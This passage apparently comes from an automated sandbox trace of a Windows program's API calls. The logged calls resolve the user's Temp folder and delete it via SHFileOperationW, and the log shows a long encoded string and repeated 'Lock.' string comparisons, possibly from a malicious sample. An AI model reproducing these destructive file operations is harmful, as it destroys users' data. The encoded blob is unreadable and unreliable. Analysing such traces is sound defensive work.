(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0200.378] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0200.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0200.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0200.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d700 [0200.380] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpFilePart=0x8cf650*="Temp") returned 0x22 [0200.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d700 | out: hHeap=0x2af0000) returned 1 [0200.380] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp")) returned 0x10 [0200.380] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 32 [0201.515] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0201.515] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0202.261] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0202.261] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.803] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0202.803] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.803] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0202.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0202.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0202.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0202.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Temporary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="emporary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mporary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="porary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ry Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nternet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ternet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ernet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="net Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="et Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0202.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.805] HeapFree (in: 